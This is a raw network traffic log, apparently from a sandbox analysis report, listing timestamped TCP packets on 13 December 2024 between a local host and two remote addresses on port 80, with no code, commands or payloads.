Dec 13, 2024 01:37:36.158706903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158721924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158746958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158759117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158787966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158801079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158828974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158938885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158966064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158982038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159003973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159064054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159089088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159106970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159138918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159198999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159224033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159238100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159270048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159331083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159357071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159372091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159399033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159413099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159437895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159451008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159476042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159490108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159521103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159706116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159737110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159748077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159776926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159790039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159820080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159835100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159861088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159874916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159900904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159914017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159941912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159955978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159981012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.159996033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160028934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160044909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160171032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160185099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160213947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160281897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160312891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160326958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160351992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160407066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160432100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160446882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160475016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160531998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160557032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160576105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160600901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160614014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160636902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160651922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160677910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160695076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160866022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160881042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160907030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.160923004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.164793968 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.166872978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.166930914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.166930914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.166946888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.166987896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.167002916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.167025089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.167052031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.167078018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.167088032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.167110920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.167136908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.167159081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.167175055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.167196989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.167218924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.167239904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.167501926 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.167543888 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.168608904 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.168617964 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.168626070 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.168673992 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.168684959 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.169447899 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.169456959 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.169488907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169502020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169527054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169563055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169578075 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.169579029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169598103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169615030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169636011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169653893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169677019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169698954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169715881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169727087 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.169784069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169801950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169801950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169801950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169817924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169835091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169852018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169873953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169889927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169923067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169934988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169953108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169972897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.169991016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.170016050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.170032978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.170053005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.170082092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.170097113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.170116901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.170130968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.170150995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.170166016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.170192003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.170212984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.170456886 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.177459002 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.181523085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181540012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181602001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181627035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181643009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181668997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181754112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181754112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181754112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181754112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181775093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181799889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181822062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181840897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181862116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181881905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181911945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181925058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181950092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181963921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.181988001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.182013035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.182027102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.182051897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.182065964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.182092905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.182106018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.185369968 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.187737942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.187758923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.187783957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.187825918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.187884092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.187911034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.187921047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.187942028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.187963009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.187975883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.187999964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188014030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188035011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188056946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188071012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188092947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188112020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188133001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188148022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188173056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188194990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188208103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188605070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188621044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188647032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188661098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188683033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188697100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188719034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188734055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188757896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188788891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188816071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188836098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188860893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188878059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188905954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188922882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188940048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188961029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188981056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.188998938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189023018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189034939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189060926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189081907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189107895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189126015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189152956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189176083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189191103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189219952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189234018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189251900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189276934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189291000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189315081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189333916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189357996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189371109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189400911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189424992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189446926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189460993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189487934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189516068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189676046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189692974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189716101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189738035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189755917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189776897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189862013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189886093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189908028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189937115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.189963102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190027952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190052032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190072060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190087080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190109968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190133095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190152884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190174103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190232038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190267086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190282106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190308094 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190330029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190355062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190372944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190397978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190421104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190439939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190459013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190505981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.190526009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.199007988 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.202892065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203089952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203089952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203089952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203089952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203089952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203089952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203089952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203089952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203142881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203142881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203144073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203157902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203181028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203212976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203212976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203229904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203250885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203268051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.203289986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.207015038 CET	80	49780	185.81.68.148	192.168.2.5
Dec 13, 2024 01:37:36.207103014 CET	49780	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:36.208300114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208331108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208352089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208369017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208399057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208411932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208437920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208451986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208472967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208486080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208507061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208522081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208542109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208553076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208578110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208592892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208612919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208631992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208647966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208671093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208686113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208705902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208719969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208749056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208846092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208873987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208888054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208909035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208924055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208945990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208959103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.208983898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209048986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209068060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209089994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209105015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209127903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209206104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209206104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209222078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209239006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209253073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209269047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209291935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209306955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209366083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209382057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209405899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209425926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209439993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209460020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209474087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209496021 CET	49775	80	192.168.2.5	185.81.68.147
